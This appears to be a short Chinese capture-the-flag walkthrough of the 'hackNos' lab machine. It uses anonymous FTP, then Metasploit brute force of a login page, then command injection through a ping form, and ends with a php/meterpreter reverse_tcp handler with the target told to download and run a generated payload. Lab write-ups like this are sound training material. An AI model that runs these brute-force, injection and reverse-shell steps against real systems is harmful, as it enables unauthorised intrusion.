一、确定IP
开放了三个端口
二、ftp匿名访问
显示220 "Security@hackNos".
且 230 login successful
三、http服务访问
点击troubleshoot会跳转到/5ecure/,然后显示需要登录
使用msf模块进行用户名/密码爆破
msfconsole
use auxiliary/scanner/http/http_login
show options
echo 'Security@hackNos' >>PASS_FILE
set AUTH_URI /5ecure/
set RHOSTS 192.168.7.45
set STOP_ON_SUCCESS true
exploit
尝试使用账号密码登录,发现有一个ping scan 命令验证有没有命令执行漏洞
四、get shell
使用msf生成木马
开启web服务
msf开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 1234
set lhost 192.168.7.45
exploit
靶机执行远程下载命令,并执行